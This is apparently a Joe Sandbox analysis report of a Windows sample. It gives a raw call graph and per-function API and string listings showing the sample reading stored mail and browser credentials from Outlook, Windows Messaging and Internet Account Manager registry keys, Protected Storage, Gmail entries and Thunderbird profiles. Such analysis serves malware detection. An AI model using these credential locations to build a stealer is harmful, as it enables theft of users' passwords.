ImageList_SetImageCount SendMessageA 7869->7871 7895 4049f1 SendMessageA 7870->7895 7871->7870 7873 40a164 SendMessageA 7873->7831 7875 40a199 SendMessageA 7874->7875 7875->7851 7878 409fa9 7877->7878 7879 40a02d 7877->7879 7880 40a175 2 API calls 7878->7880 7879->7833 7881 409fb7 7 API calls 7880->7881 7881->7879 7883 407bc8 LoadMenuA 7882->7883 7883->7861 7883->7863 7885 412360 7884->7885 7886 407bde GetMenuItemCount 7885->7886 7887 407d1c 7886->7887 7891 407bfc 7886->7891 7887->7863 7888 407c01 memset GetMenuItemInfoA 7888->7891 7889 407c56 memset strchr 7889->7891 7890 407bce 4 API calls 7890->7891 7891->7887 7891->7888 7891->7889 7891->7890 7892 407ef3 4 API calls 7891->7892 7893 407cc6 strcat 7891->7893 7894 407cd9 ModifyMenuA 7891->7894 7892->7891 7893->7894 7894->7891 7895->7873 5771 41211a 5790 412308 5771->5790 5773 412126 GetModuleHandleA 5774 412138 __set_app_type __p__fmode __p__commode 5773->5774 5776 4121ca 5774->5776 5777 4121d2 __setusermatherr 5776->5777 5778 4121de 5776->5778 5777->5778 5791 4122f2 _controlfp 5778->5791 5780 4121e3 _initterm __getmainargs _initterm 5781 41223a GetStartupInfoA 5780->5781 5783 41226e GetModuleHandleA 5781->5783 5792 40bb8d 5783->5792 5787 412298 exit 5788 41229f _cexit 5787->5788 5789 4122d4 5788->5789 5790->5773 5791->5780 5842 404841 LoadLibraryA 5792->5842 5794 40bba9 5828 40bbad 5794->5828 5851 40f41d 5794->5851 5796 40bbb8 5855 40b91e ??2@YAPAXI 5796->5855 5798 40bbe4 5869 406df1 5798->5869 5803 40bc21 5892 4083a7 memset 5803->5892 5804 40bc0d 5887 4084d8 memset 5804->5887 5809 40bdca ??3@YAXPAX 5811 40bde8 DeleteObject 5809->5811 5812 40bdfc 5809->5812 5810 406f65 _stricmp 5813 40bc37 5810->5813 5811->5812 5920 406a7d free free 5812->5920 5815 40bc50 EnumResourceTypesA 5813->5815 5816 40bc3b RegDeleteKeyA 5813->5816 5818 40bc90 5815->5818 5819 40bc78 MessageBoxA 5815->5819 5816->5809 5817 40be0d 5921 404638 5817->5921 5821 40bce9 CoInitialize 5818->5821 5903 40bab7 5818->5903 5819->5809 5897 40b84c memset memset RegisterClassA 5821->5897 5825 40bcfa ShowWindow KiUserCallbackDispatcher LoadAcceleratorsA 5902 40aeb7 PostMessageA 5825->5902 5828->5787 5828->5788 5829 40bce7 5829->5821 5830 40bcaa ??3@YAXPAX 5830->5812 5832 40bccd DeleteObject 5830->5832 5832->5812 5834 40bd42 KiUserCallbackDispatcher 5835 40bdc4 CoUninitialize 5834->5835 5836 40bd56 5834->5836 5835->5809 5837 40bd5c TranslateAcceleratorA 5836->5837 5839 40bd82 IsDialogMessageA 5836->5839 5840 40bd8e IsDialogMessageA 5836->5840 5837->5836 5838 40bdb6 KiUserCallbackDispatcher 5837->5838 5838->5835 5838->5837 5839->5838 5839->5840 5840->5838 5841 40bda0 TranslateMessage DispatchMessageA 5840->5841 5841->5838 5843 404894 #17 5842->5843 5844 40486c GetProcAddress 5842->5844 5847 40489d 5843->5847 5845 404885 FreeLibrary 5844->5845 5846 40487c 5844->5846 5845->5843 5848 404890 5845->5848 5846->5845 5849 4048a4 MessageBoxA 5847->5849 5850 4048bb 5847->5850 5848->5847 5849->5794 5850->5794 5852 40f426 LoadLibraryA 5851->5852 5853 40f44b 5851->5853 5852->5853 5854 40f43a GetProcAddress 5852->5854 5853->5796 5854->5853 5856 40b94f ??2@YAPAXI 5855->5856 5858 40b974 5856->5858 5859 40b96d 5856->5859 5861 40b9a0 DeleteObject 5858->5861 5862 40b9ad 5858->5862 5932 404026 5859->5932 5861->5862 5925 40625c 5862->5925 5864 40b9b2 5928 4019da 5864->5928 5867 4019da strncat 5868 40ba06 strcpy 5867->5868 5868->5798 5953 406a7d free free 5869->5953 5873 406b54 malloc memcpy free free 5876 406e2c 5873->5876 5874 406f11 5882 406f39 5874->5882 5975 406b54 5874->5975 5876->5873 5876->5874 5877 406eaf free 5876->5877 5876->5882 5957 406aa3 strlen 5876->5957 5967 406104 5876->5967 5877->5876 5881 406aa3 7 API calls 5881->5882 5954 406b8a 5882->5954 5883 406f65 5884 406f8c 5883->5884 5885 406f6d 5883->5885 5884->5803 5884->5804 5885->5884 5886 406f76 _stricmp 5885->5886 5886->5884 5886->5885 5980 4084b2 5887->5980 5889 408507 5985 4083e4 5889->5985 5893 4084b2 3 API calls 5892->5893 5894 4083d6 5893->5894 6007 40831f 5894->6007 5898 4019da strncat 5897->5898 5899 40b8f5 5898->5899 5900 4019da strncat 5899->5900 5901 40b906 CreateWindowExA 5900->5901 5901->5825 5902->5834 6021 402393 5903->6021 5909 40bb16 5913 40bb87 5909->5913 6075 40b031 memset GetModuleFileNameA strrchr 5909->6075 5910 40bb1b 6062 40ba21 _stricmp 5910->6062 5913->5829 5913->5830 5916 40bb35 6096 409c9c 5916->6096 5918 40bb7d 6117 40b1dc 5918->6117 5920->5817 5922 404645 5921->5922 5923 40463e free 5921->5923 5924 406a7d free free 5922->5924 5923->5922 5924->5828 5939 40619b memset strcpy 5925->5939 5927 406273 CreateFontIndirectA 5927->5864 5929 401a06 5928->5929 5930 4019e7 strncat 5929->5930 5931 401a0a memset LoadIconA 5929->5931 5930->5929 5931->5867 5940 408638 5932->5940 5936 4040cc 5951 4046e1 strcpy 5936->5951 5938 40415f 5938->5858 5939->5927 5952 406578 memset 5940->5952 5942 40864b ??2@YAPAXI 5943 40865f ??2@YAPAXI 5942->5943 5945 408680 ??2@YAPAXI 5943->5945 5947 4086a1 ??2@YAPAXI 5945->5947 5949 40402f 5947->5949 5950 4046e1 strcpy 5949->5950 5950->5936 5951->5938 5952->5942 5953->5876 5955 406b90 free 5954->5955 5956 406b9a 5954->5956 5955->5956 5956->5883 5958 406ad6 5957->5958 5959 406acd free 5957->5959 5961 406104 3 API calls 5958->5961 5960 406ae0 5959->5960 5962 406af0 free 5960->5962 5963 406af9 5960->5963 5961->5960 5965 406b05 memcpy 5962->5965 5964 406104 3 API calls 5963->5964 5966 406b04 5964->5966 5965->5876 5966->5965 5968 406151 5967->5968 5969 40610b malloc 5967->5969 5968->5876 5971 406147 5969->5971 5972 40612c 5969->5972 5971->5876 5973 406140 free 5972->5973 5974 406130 memcpy 5972->5974 5973->5971 5974->5973 5976 406b62 free 5975->5976 5977 406b6d 5975->5977 5978 406b78 5976->5978 5979 406104 3 API calls 5977->5979 5978->5881 5979->5978 5996 40616a GetModuleFileNameA 5980->5996 5982 4084b8 strrchr 5983 4084c7 5982->5983 5984 4084ca strcat 5982->5984 5983->5984 5984->5889 5997 412360 5985->5997 5990 407fbf 3 API calls 5991 40842c EnumResourceNamesA EnumResourceNamesA strcpy memset 5990->5991 5992 408478 LoadStringA 5991->5992 5993 40848e 5992->5993 5993->5992 5994 4084a6 5993->5994 6004 40802d _itoa 5993->6004 5994->5809 5996->5982 5998 4083f1 strcpy strcpy 5997->5998 5999 407fbf 5998->5999 6000 412360 5999->6000 6001 407fcc memset GetPrivateProfileStringA 6000->6001 6002 408027 6001->6002 6003 408017 WritePrivateProfileStringA 6001->6003 6002->5990 6003->6002 6005 407fbf 3 API calls 6004->6005 6006 40805f 6005->6006 6006->5993 6017 406155 GetFileAttributesA 6007->6017 6009 408328 6010 4083a1 6009->6010 6011 40832d strcpy strcpy GetPrivateProfileIntA 6009->6011 6010->5810 6018 407f2b GetPrivateProfileStringA 6011->6018 6013 40837c 6019 407f2b GetPrivateProfileStringA 6013->6019 6015 40838d 6020 407f2b GetPrivateProfileStringA 6015->6020 6017->6009 6018->6013 6019->6015 6020->6010 6122 4088c6 6021->6122 6024 401e4a memset 6161 40f4ca 6024->6161 6027 401ea3 6191 4062b7 strcpy 6027->6191 6028 401eb5 6177 406155 GetFileAttributesA 6028->6177 6031 401ec7 strlen strlen 6033 401ef6 6031->6033 6034 401f09 6031->6034 6035 4062b7 4 API calls 6033->6035 6178 406155 GetFileAttributesA 6034->6178 6035->6034 6037 401f16 6179 401c56 6037->6179 6040 401f56 6194 40f1b0 RegOpenKeyExA 6040->6194 6042 401c56 7 API calls 6042->6040 6043 401f72 6044 402168 6043->6044 6045 401f7d memset 6043->6045 6047 402189 _stricmp 6044->6047 6048 402176 ExpandEnvironmentStringsA 6044->6048 6195 40f276 RegEnumKeyExA 6045->6195 6047->5909 6047->5910 6204 406155 GetFileAttributesA 6048->6204 6050 40215f RegCloseKey 6050->6044 6051 401fba atoi 6052 401fd0 memset memset sprintf 6051->6052 6059 401faa 6051->6059 6196 40f232 6052->6196 6055 402146 6055->6050 6056 402057 memset memset strlen strlen 6056->6059 6057 4062b7 strlen strcat strcpy strcat 6057->6059 6058 4020be strlen strlen 6058->6059 6059->6050 6059->6051 6059->6055 6059->6056 6059->6057 6059->6058 6060 406155 GetFileAttributesA 6059->6060 6061 402148 strcpy 6059->6061 6203 40f276 RegEnumKeyExA 6059->6203 6060->6059 6061->6050 6063 40ba32 6062->6063 6064 40ba36 _stricmp 6062->6064 6063->5909 6065 40ba47 6064->6065 6066 40ba4b _stricmp 6064->6066 6065->5909 6067 40ba60 _stricmp 6066->6067 6068 40ba5c 6066->6068 6069 40ba71 6067->6069 6070 40ba75 _stricmp 6067->6070 6068->5909 6069->5909 6071 40ba86 6070->6071 6072 40ba8a _stricmp 6070->6072 6071->5909 6073 40ba9b 6072->6073 6074 40ba9f _mbsicmp 6072->6074 6073->5909 6074->5909 6076 40b081 6075->6076 6077 40b084 strcat strcpy strcpy 6075->6077 6076->6077 6078 40b0fc 6077->6078 6079 40b171 6078->6079 6080 40b161 GetWindowPlacement 6078->6080 6081 40b197 6079->6081 6232 401823 6079->6232 6080->6079 6225 4087db 6081->6225 6085 40a6c6 6086 40a725 6085->6086 6091 40a6da 6085->6091 6258 405e36 LoadCursorA SetCursor 6086->6258 6088 40a72a 6090 406f65 _stricmp 6088->6090 6089 40a6e1 _mbsicmp 6089->6091 6092 40a74e 6090->6092 6091->6086 6091->6089 6248 40a283 6091->6248 6093 40a798 SetCursor 6092->6093 6095 40a78f qsort 6092->6095 6093->5916 6095->6093 6097 408a97 3 API calls 6096->6097 6098 409cb0 6097->6098 6099 409cc1 GetStdHandle 6098->6099 6100 409cb8 6098->6100 6102 409cbe 6099->6102 6266 405eee CreateFileA 6100->6266 6103 409cd7 6102->6103 6104 409dcf 6102->6104 6267 405e36 LoadCursorA SetCursor 6103->6267 6105 405f4b 9 API calls 6104->6105 6107 409dd8 6105->6107 6107->5918 6108 409d29 6115 409d43 6108->6115 6274 40933e 6108->6274 6109 409ce4 6109->6108 6109->6115 6268 409221 6109->6268 6112 409d78 6113 409dc1 SetCursor 6112->6113 6114 409db8 CloseHandle 6112->6114 6113->6107 6114->6113 6115->6112 6284 405f4b 6115->6284 6118 40b1f3 6117->6118 6119 40b1e7 6117->6119 6118->5913 6300 4041b3 6119->6300 6134 4086dc 6122->6134 6125 40892a memcpy memcpy 6126 408984 6125->6126 6126->6125 6127 407a69 12 API calls 6126->6127 6128 4089c2 ??2@YAPAXI ??2@YAPAXI 6126->6128 6127->6126 6129 4089fe ??2@YAPAXI 6128->6129 6131 408a35 6128->6131 6129->6131 6131->6131 6144 408846 6131->6144 6133 4023a2 6133->6024 6135 4086e7 ??3@YAXPAX 6134->6135 6136 4086ee 6134->6136 6135->6136 6137 4086f5 ??3@YAXPAX 6136->6137 6138 4086fc 6136->6138 6137->6138 6139 408706 ??3@YAXPAX 6138->6139 6140 40870d 6138->6140 6139->6140 6141 40872d ??2@YAPAXI ??2@YAPAXI 6140->6141 6142 408726 ??3@YAXPAX 6140->6142 6143 40871d ??3@YAXPAX 6140->6143 6141->6125 6142->6141 6143->6142 6145 406b8a free 6144->6145 6146 40884f 6145->6146 6147 406b8a free 6146->6147 6148 408857 6147->6148 6149 406b8a free 6148->6149 6150 40885f 6149->6150 6151 406b8a free 6150->6151 6152 408867 6151->6152 6153 406b54 4 API calls 6152->6153 6154 40887a 6153->6154 6155 406b54 4 API calls 6154->6155 6156 408884 6155->6156 6157 406b54 4 API calls 6156->6157 6158 40888e 6157->6158 6159 406b54 4 API calls 6158->6159 6160 408898 6159->6160 6160->6133 6162 40f41d 2 API calls 6161->6162 6163 40f4d9 6162->6163 6164 40f50c memset 6163->6164 6205 406282 6163->6205 6165 40f52c 6164->6165 6208 40f1b0 RegOpenKeyExA 6165->6208 6169 40f4fd SHGetSpecialFolderPathA 6170 401e7f strlen strlen 6169->6170 6170->6027 6170->6028 6171 40f559 6172 40f58e strcpy 6171->6172 6209 40f44c 6171->6209 6172->6170 6174 40f56a 6213 40f1f1 RegQueryValueExA 6174->6213 6176 40f582 RegCloseKey 6176->6172 6177->6031 6178->6037 6214 40f1b0 RegOpenKeyExA 6179->6214 6181 401c71 6182 401cd2 6181->6182 6215 40f1f1 RegQueryValueExA 6181->6215 6182->6040 6182->6042 6184 401c8f 6185 401c96 strchr 6184->6185 6186 401cc9 RegCloseKey 6184->6186 6185->6186 6187 401caa strchr 6185->6187 6186->6182 6187->6186 6188 401cb9 6187->6188 6216 4060da strlen 6188->6216 6190 401cc6 6190->6186 6219 405f29 strlen 6191->6219 6194->6043 6195->6059 6223 40f1b0 RegOpenKeyExA 6196->6223 6198 40f248 6199 40f271 6198->6199 6224 40f1f1 RegQueryValueExA 6198->6224 6199->6059 6201 40f260 RegCloseKey 6201->6199 6203->6059 6204->6047 6206 406291 GetVersionExA 6205->6206 6207 4062a2 6205->6207 6206->6207 6207->6164 6207->6169 6208->6171 6212 40f451 6209->6212 6210 40f4be strcpy 6210->6174 6211 40f4a1 6211->6174 6212->6210 6212->6211 6213->6176 6214->6181 6215->6184 6217 4060eb 6216->6217 6218 4060ee memcpy 6216->6218 6217->6218 6218->6190 6220 405f34 6219->6220 6221 405f48 strcat 6219->6221 6220->6221 6222 405f3b strcat 6220->6222 6221->6028 6222->6221 6223->6198 6224->6201 6226 4087ea 6225->6226 6228 4087f8 6225->6228 6239 4085ab 6226->6239 6229 408843 6228->6229 6230 408835 6228->6230 6229->6085 6244 40851b 6230->6244 6233 401832 6232->6233 6234 4018ac 6232->6234 6233->6234 6235 401866 GetSystemMetrics 6233->6235 6234->6081 6235->6234 6236 40187a GetSystemMetrics 6235->6236 6236->6234 6237 401888 6236->6237 6237->6234 6238 401891 SetWindowPos 6237->6238 6238->6234 6240 408611 6239->6240 6241 4085ba memset 6239->6241 6240->6228 6241->6240 6242 4085d1 SendMessageA 6241->6242 6243 4085fc 6242->6243 6243->6240 6243->6242 6245 4085a5 6244->6245 6246 40852a 6244->6246 6245->6229 6246->6245 6247 40856e SendMessageA 6246->6247 6247->6246 6259 408a97 ??2@YAPAXI 6248->6259 6250 40a291 6251 40a2a8 strlen 6250->6251 6255 40a2e8 6250->6255 6254 40a2b4 atoi 6251->6254 6251->6255 6252 40a2fc _mbsicmp _mbsicmp 6252->6255 6253 40a2c5 6253->6091 6254->6253 6255->6252 6257 40a356 6255->6257 6256 406a01 strlen strlen _memicmp 6256->6257 6257->6253 6257->6256 6258->6088 6262 408b41 ??3@YAXPAX 6259->6262 6263 408ace 6259->6263 6262->6250 6263->6262 6264 404d9c SendMessageA 6263->6264 6265 404dca 6264->6265 6265->6263 6266->6102 6267->6109 6269 40926d 6268->6269 6273 409229 6268->6273 6289 405f07 strlen WriteFile 6269->6289 6271 40927b 6271->6108 6272 405f07 strlen WriteFile 6272->6273 6273->6269 6273->6272 6275 409452 6274->6275 6282 409353 6274->6282 6290 405f07 strlen WriteFile 6275->6290 6277 409460 6277->6115 6278 40937d strchr 6279 40938b strchr 6278->6279 6278->6282 6279->6282 6280 405f07 strlen WriteFile 6280->6282 6281 406c0e 7 API calls 6281->6282 6282->6275 6282->6278 6282->6280 6282->6281 6283 406b8a free 6282->6283 6283->6282 6285 405f63 6284->6285 6286 405f5b GetLastError 6284->6286 6291 405e50 6285->6291 6286->6285 6289->6271 6290->6277 6292 405e84 FormatMessageA 6291->6292 6293 405e6d LoadLibraryExA 6291->6293 6295 405ec2 strcpy 6292->6295 6296 405e9d strlen 6292->6296 6293->6292 6294 405e7f 6293->6294 6294->6292 6299 405ed1 sprintf MessageBoxA 6295->6299 6297 405eb7 LocalFree 6296->6297 6298 405eaa strcpy 6296->6298 6297->6299 6298->6297 6299->6112 6311 4047fb 6300->6311 6304 404221 6305 4047fb FreeLibrary 6304->6305 6306 40423c 6305->6306 6318 404182 6306->6318 6310 404248 ??3@YAXPAX 6310->6118 6312 404210 6311->6312 6313 40480f FreeLibrary 6311->6313 6314 40ef1c 6312->6314 6313->6312 6315 40ef2a 6314->6315 6343 40ef05 6315->6343 6319 404638 free 6318->6319 6320 40418e 6319->6320 6346 40e6b4 6320->6346 6323 406b8a free 6324 4041a9 6323->6324 6325 406b8a free 6324->6325 6326 4041b1 6325->6326 6327 408742 6326->6327 6328 4086dc 5 API calls 6327->6328 6329 408750 6328->6329 6330 408763 6329->6330 6332 406b8a free 6329->6332 6331 408776 6330->6331 6333 406b8a free 6330->6333 6334 408789 6331->6334 6337 406b8a free 6331->6337 6335 40875c ??3@YAXPAX 6332->6335 6336 40876f ??3@YAXPAX 6333->6336 6339 406b8a free 6334->6339 6340 40879c free 6334->6340 6335->6330 6336->6331 6338 408782 ??3@YAXPAX 6337->6338 6338->6334 6341 408795 ??3@YAXPAX 6339->6341 6340->6310 6341->6340 6344 40ef10 FreeLibrary 6343->6344 6345 40ef1b 6343->6345 6344->6345 6345->6304 6347 404196 6346->6347 6348 40e6b9 SetCurrentDirectoryA 6346->6348 6347->6323 6348->6347 5756 40f2a6 5759 40f17f 5756->5759 5758 40f2c6 5760 40f18b 5759->5760 5761 40f19d GetPrivateProfileIntA 5759->5761 5764 40f097 memset _itoa WritePrivateProfileStringA 5760->5764 5761->5758 5763 40f198 5763->5758 5764->5763 5765 40a7a8 5768 40a7b2 5765->5768 5769 40a7c5 8 API calls 5768->5769 5770 40a7b0 5768->5770 5769->5770 6354 4017bd 6355 4017c9 ExitProcess 6354->6355 6356 4017d1 6354->6356

                  Executed Functions

                  Function 004073B6 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 173 4073b6-4074ff memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 174 407501 173->174 175 407535-407538 173->175 178 407507-407510 174->178 176 407569-40756d 175->176 177 40753a-407543 175->177 179 407545-407549 177->179 180 40754a-407567 177->180 181 407512-407516 178->181 182 407517-407533 178->182 179->180 180->176 180->177 181->182 182->175 182->178
                  APIs
                  • memset.MSVCRT ref: 00407418
                  • memset.MSVCRT ref: 0040742C
                  • memset.MSVCRT ref: 00407446
                  • memset.MSVCRT ref: 0040745B
                  • GetComputerNameA.KERNEL32(?,?), ref: 0040747D
                  • GetUserNameA.ADVAPI32(?,?), ref: 00407491
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074B0
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074C5
                  • strlen.MSVCRT ref: 004074CE
                  • strlen.MSVCRT ref: 004074DD
                  • memcpy.MSVCRT ref: 004074EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$ByteCharMulusermeWidestrlen$ComputerUsermemcpy
                  • String ID: 5$H$O$b$i$}$}
                  • API String ID: 1832431107-3760989150
                  • Opcode ID: aceb3002e6d76f9fd17eae514da83f7be29cbb3531b765aef18c994d04d9c626
                  • Instruction ID: c4a028c48163d552ebb965a22663fb4caedd15d38ec5c0ca2e6f283cdba292cd
                  • Opcode Fuzzy Hash: aceb3002e6d76f9fd17eae514da83f7be29cbb3531b765aef18c994d04d9c626
                  • Instruction Fuzzy Hash: 7A51E771C0025DAEDB11CFA8CC40BEEBBBCEF49314F0442AAE555E6191D3789B85CB65
                  Function 00403C17 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184librarystringloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0040EF05: FreeLibrary.KERNELBASE(?,0040EF39,?,?,?,?,?,?,00404221), ref: 0040EF11
                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C36
                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4B
                  • strcpy.MSVCRT(?,?), ref: 00403E55
                  Strings
                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3C
                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD7
                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C91
                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C87
                  • pstorec.dll, xrefs: 00403C31
                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9B
                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D43
                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA5
                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA5
                  • PStoreCreateInstance, xrefs: 00403C45
                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6F
                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFC
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Library$AddressFreeLoadProcstrcpy
                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                  • API String ID: 2884822230-317895162
                  • Opcode ID: edd8b6eb8bcfee5f27bfe3d894378078f305261ef97242b4e9c725312b665777
                  • Instruction ID: c79aa312a60a802310c0dbcdda9968b0b76b201639e98401828b305836cf62c0
                  • Opcode Fuzzy Hash: edd8b6eb8bcfee5f27bfe3d894378078f305261ef97242b4e9c725312b665777
                  • Instruction Fuzzy Hash: BE51C472604601BAD710AF72CC46FDABA6CAF01709F14017FF905B61C2EB7DAB548A99
                  Function 0040702D Relevance: 6.1, APIs: 4, Instructions: 58filestringCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,0041134A,*.oeaccount,0041141B,?,00000104), ref: 00407043
                  • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,0041134A,*.oeaccount,0041141B,?,00000104), ref: 00407061
                  • strlen.MSVCRT ref: 00407091
                  • strlen.MSVCRT ref: 00407099
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileFindstrlen$FirstNext
                  • String ID:
                  • API String ID: 379999529-0
                  • Opcode ID: 23327769c2c6ed145b7f0a678d94cded64fbce7ba272a02f3800eca3ff4be886
                  • Instruction ID: ee1fc6f362411e34e0c03f62be7ba86f9bee0943d1b98e177d8d8cef5f5d9398
                  • Opcode Fuzzy Hash: 23327769c2c6ed145b7f0a678d94cded64fbce7ba272a02f3800eca3ff4be886
                  • Instruction Fuzzy Hash: 1E1182728092059FD3149B34D844ADBB7DC9F04325F204A3FF05AD31D0EB38B945876A
                  Function 0040F37C Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                  Download Yara Rule
                  APIs
                  • FindResourceA.KERNEL32(?,?,?), ref: 0040F389
                  • SizeofResource.KERNEL32(?,00000000), ref: 0040F39A
                  • LoadResource.KERNEL32(?,00000000), ref: 0040F3AA
                  • LockResource.KERNEL32(00000000), ref: 0040F3B5
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Resource$FindLoadLockSizeof
                  • String ID:
                  • API String ID: 3473537107-0
                  • Opcode ID: 9cd59cfcab74544fb09ebac2717695010326dcaa36405c725c3e94a77d8c1a91
                  • Instruction ID: 02aaebfec467b3bf7519b160cf801d0b857f87d6ebd9b35fbb0925b6dc32657f
                  • Opcode Fuzzy Hash: 9cd59cfcab74544fb09ebac2717695010326dcaa36405c725c3e94a77d8c1a91
                  • Instruction Fuzzy Hash: B601D6327002156BCB294FA5DC45A9BBFAEFF857A1704803AFC09E72A1DB70C905D6C8
                  Function 00401E4A Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 00401E6C
                    • Part of subcall function 0040F4CA: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 0040F501
                  • strlen.MSVCRT ref: 00401E85
                  • strlen.MSVCRT ref: 00401E93
                  • strlen.MSVCRT ref: 00401ED9
                  • strlen.MSVCRT ref: 00401EE7
                  • memset.MSVCRT ref: 00401F92
                  • atoi.MSVCRT ref: 00401FC1
                  • memset.MSVCRT ref: 00401FE4
                  • sprintf.MSVCRT ref: 00402011
                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                  • memset.MSVCRT ref: 00402067
                  • memset.MSVCRT ref: 0040207C
                  • strlen.MSVCRT ref: 00402082
                  • strlen.MSVCRT ref: 00402090
                  • strlen.MSVCRT ref: 004020C3
                  • strlen.MSVCRT ref: 004020D1
                  • memset.MSVCRT ref: 00401FF9
                    • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                    • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                  • strcpy.MSVCRT(?,00000000), ref: 00402158
                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402162
                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040217D
                    • Part of subcall function 00406155: GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
